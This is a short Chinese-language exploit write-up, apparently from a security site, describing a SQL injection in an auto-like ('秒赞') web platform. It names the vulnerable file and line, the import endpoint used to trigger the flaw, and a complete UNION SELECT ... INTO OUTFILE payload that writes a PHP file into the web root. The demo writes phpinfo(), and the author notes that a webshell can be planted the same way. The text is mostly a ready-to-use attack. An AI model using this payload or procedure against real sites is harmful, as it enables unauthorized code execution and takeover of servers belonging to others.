![某秒赞平台通用getshell漏洞-[php函数未过滤]-华盟网](https://www.77169.net/wp-content/uploads/2016/07/2016021411244955.jpg)
虽然文件夹下面有/includes/360safe/,但是根本无法拦截我们getshell:
此次存在问题文件:/template/public/sc.php
问题代码在217行:
![某秒赞平台通用getshell漏洞-[php函数未过滤]](https://www.77169.net//wp-content/uploads/2016/07/2016021411244955.jpg)
$rowm1=$DB->get_row(“SELECT * FROM “.DBQZ.”_job WHERE url='{$val}’ limit 1”);
看到这里url='{$val}’ 没有经过任何过滤,直接带入sql语句
我们看看利用地方:index.php?mod=sc&my=upload&sys=1
位于文件导入:
![某秒赞平台通用getshell漏洞-[php函数未过滤]](https://www.77169.net//wp-content/uploads/2016/07/2016021411261356.jpg)
我们看看sql语句做了什么:www.baidu.com 为监控网站
![某秒赞平台通用getshell漏洞-[php函数未过滤]](https://www.77169.net//wp-content/uploads/2016/07/2016021411271919.jpg)
可以看出这个是做一个对比语句,如果网址存在则返回一个,网址不存在就直接添加进去。那么
SELECT * FROM wjob_job WHERE url=’http://www.baidu.com/’ limit 1
这里是没有过滤的,我们可以构造语句来写wenshell等等,由于是演示,就直接写:
D:/xampp/htdocs/www
我们构造一个语句:
SELECT * FROM wjob_job WHERE url=’http://www.baidu.com/’ AND 1 =1 UNION SELECT 1 , 2, 3, ‘<?php phpinfo() ?>’, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23 INTO OUTFILE ‘D:/xampp/htdocs/www/sss.php’;#
配合路径就能直接写进去:新建个txt写上语句
![某秒赞平台通用getshell漏洞-[php函数未过滤]](https://www.77169.net//wp-content/uploads/2016/07/2016021411293226.jpg)
![某秒赞平台通用getshell漏洞-[php函数未过滤]](https://www.77169.net//wp-content/uploads/2016/07/2016021411301829.jpg)
然后从新导入一个任务
![某秒赞平台通用getshell漏洞-[php函数未过滤]](https://www.77169.net//wp-content/uploads/2016/07/2016021411311848.jpg)
看看执行l了:
![某秒赞平台通用getshell漏洞-[php函数未过滤]](https://www.77169.net//wp-content/uploads/2016/07/2016021411321088.jpg)
成功写入文件:
![某秒赞平台通用getshell漏洞-[php函数未过滤]](https://www.77169.net//wp-content/uploads/2016/07/2016021411330714.jpg)
这里能做的不仅仅是getshell,提供了思路,大牛们可以继续挖掘深入。
文章组织的不是很好,还请大家见谅。
暂无评论内容